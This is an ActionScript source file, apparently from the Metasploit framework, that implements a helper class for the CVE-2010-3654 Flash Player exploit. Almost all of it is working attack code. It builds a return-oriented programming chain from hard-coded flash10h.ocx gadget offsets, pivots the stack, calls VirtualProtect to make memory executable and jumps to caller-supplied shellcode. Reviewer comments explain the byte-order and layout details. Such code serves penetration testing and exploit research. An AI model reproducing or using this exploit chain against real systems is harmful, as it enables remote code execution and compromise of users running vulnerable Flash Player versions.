metasploit-framework/unstable-modules/external/source/exploits/CVE-2010-3654/Real_Ref_Class.as


package poc {
import flash.display.Sprite
import flash.utils.*
// Helper class for the CVE-2010-3654 Flash Player exploit. It builds the
// object-pointer string, the ROP chain that reaches VirtualProtect and then
// the shellcode, and stores the shellcode string supplied by the caller.
//
// NOTE(review): every write below is byte-exact and order-dependent. A fresh
// ByteArray defaults to Endian.BIG_ENDIAN, so the four address bytes are
// reversed by hand (t[3], t[2], t[1], t[0]) to land little-endian for x86,
// while the plain writeUnsignedInt() constants are NOT reversed and therefore
// reach memory with their bytes swapped relative to the literal
// (0x00200000 -> 0x00002000, 0x40000000 -> 0x00000040). The gadget offsets
// are hard-coded for one specific flash10h.ocx build; any other build needs
// freshly derived gadgets. Do not reorder or restyle these writes.
public class Real_Ref_Class
{
// Builds a string of 64 'A' filler characters followed by objectLeak as four
// characters in little-endian byte order (b[0] is the most significant byte
// because ByteArray is big-endian by default, so b[3] is emitted first).
// imageBase is accepted but not used here.
// NOTE(review): String.fromCharCode() produces UTF-16 code units, so the
// in-memory layout of these four "bytes" depends on how the consumer of this
// string stores it -- confirm against the caller before changing.
public static function static_func1(objectLeak:uint ,imageBase:uint):String
{
var address:uint = objectLeak ;
var b:ByteArray = new ByteArray();
b.writeInt(address);
var str:String = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + String.fromCharCode(b[3],b[2],b[1],b[0]);
return str;
}
// Builds the ROP chain as a string. Layout, in order:
//   1. stack pivot gadget (imageBase + 0xfa851) followed by 18 words of padding
//   2. a pop-edi/esi/ebp style gadget (imageBase + 0x034D976) followed by two
//      filler words and then the three register values:
//        edi = shellcodeAddrLeak, esi = size, ebp = protection flag
//      plus 9 words of padding
//   3. a gadget that calls VirtualProtect with those registers
//      (imageBase + 0x34D962) followed by 12 words of padding
//   4. shellcodeAddrLeak again as the return target, then 5 words of padding
// imageBase is the load address of flash10h.ocx; shellcodeAddrLeak is the
// address the shellcode string was leaked at.
// The size and protection words are written with the default big-endian
// ByteArray, so on x86 they are read as 0x2000 and 0x40 (0x40 is presumably
// PAGE_EXECUTE_READWRITE -- matches the "permission" comment, not verified).
public static function ROPPayload(imageBase:uint ,shellcodeAddrLeak:uint):String
{
var b:ByteArray = new ByteArray();
var address:uint = imageBase + 0xfa851;
var t:ByteArray = new ByteArray();
t.writeInt(address);
b.writeByte(t[3]);
b.writeByte(t[2]);
b.writeByte(t[1]);
b.writeByte(t[0]); // stack pivot address (flash10h.ocx), written little-endian
// 18 words of padding consumed by the pivot (exact count is layout-critical)
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
address = imageBase + 0x034D976;
t = new ByteArray();
t.writeInt(address);
b.writeByte(t[3]);
b.writeByte(t[2]);
b.writeByte(t[1]);
b.writeByte(t[0]); // gadget that loads edi, esi, ebp from the stack (flash10h.ocx)
b.writeUnsignedInt(0x41414141); // filler popped before the three register values
b.writeUnsignedInt(0x47474747); // filler; distinct marker value, not an address
address = shellcodeAddrLeak;
t = new ByteArray();
t.writeInt(address);
b.writeByte(t[3]);
b.writeByte(t[2]);
b.writeByte(t[1]);
b.writeByte(t[0]); // edi: shellcode address, written little-endian
b.writeUnsignedInt(0x00200000); // esi: region size; big-endian write, reads as 0x2000 on x86
b.writeUnsignedInt(0x40000000); // ebp: protection; big-endian write, reads as 0x40 on x86
// 9 words of padding before the VirtualProtect call gadget
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
address = imageBase + 0x34D962;
t = new ByteArray();
t.writeInt(address);
b.writeByte(t[3]);
b.writeByte(t[2]);
b.writeByte(t[1]);
b.writeByte(t[0]); // gadget that calls VirtualProtect (flash10h.ocx)
// 12 words of padding consumed before control reaches the shellcode address
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
address = shellcodeAddrLeak;
t = new ByteArray();
t.writeInt(address);
b.writeByte(t[3]);
b.writeByte(t[2]);
b.writeByte(t[1]);
b.writeByte(t[0]); // return target: shellcode address, written little-endian
// trailing padding
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
b.writeUnsignedInt(0x41414141);
// NOTE(review): toString() decodes the buffer as UTF-8 (or the system code
// page when System.useCodePage is true). Gadget addresses will contain bytes
// >= 0x80 that are not valid UTF-8; the chain only survives if the decoder
// passes such bytes through unchanged -- confirm on the target player build.
return b.toString();
}
// Parses param_in as an integer and forces its low three bits on.
// NOTE(review): the OR with 7 is presumably a pointer/atom tag expected by
// the caller; verify against where the result is used.
public static function strToInt(param_in:String):uint
{
var a:uint = parseInt(param_in);
a = a | 0x00000007
return a;
}
// Shellcode string most recently stored by setShellcode(); empty by default.
public static var shell:String = new String();
// Stores buf as the shellcode returned by shellcode(). No validation is
// performed on its contents.
public static function setShellcode(buf:String):void
{
shell = buf;
}
// Returns whatever setShellcode() stored (the caller is expected to supply an
// alphanumeric-encoded payload, e.g. calc.exe; nothing here enforces that).
public static function shellcode():String
{
return shell;
}
}
}